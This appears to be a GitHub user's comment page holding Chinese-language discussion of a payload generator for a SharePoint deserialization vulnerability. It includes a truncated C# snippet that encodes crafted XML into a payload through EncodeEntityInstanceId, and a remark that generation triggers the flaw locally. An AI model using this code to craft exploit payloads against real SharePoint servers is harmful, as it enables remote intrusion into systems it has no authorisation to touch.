Huang Ge

icon location Guangzhou, China

Results 2 comments of Huang Ge

您好,请问是用什么方式将XML序列化为16进制数据的?

就是调用sharepoint自有的接口EncodeEntityInstanceId,将xml字符串序列化为对象实例, ``` private string EncodeEntityStr(String xml) { try { object[] objs = new object[1]; objs[0] = XmlDesc(xml); var payloadstr = Microsoft.SharePoint.BusinessData.Infrastructure.EntityInstanceIdEncoder.EncodeEntityInstanceId(objs); return payloadstr; } catch (Exception) { MessageBox.Show("xml error", "Tip",...

你这工具生成payload的时候会把payload在本地先执行一遍,你敢不敢修一修

老哥,生成对象和解析对象的时候触发这个序列化漏洞,才能生成payload呀 代码传上来了,干净卫生,别怕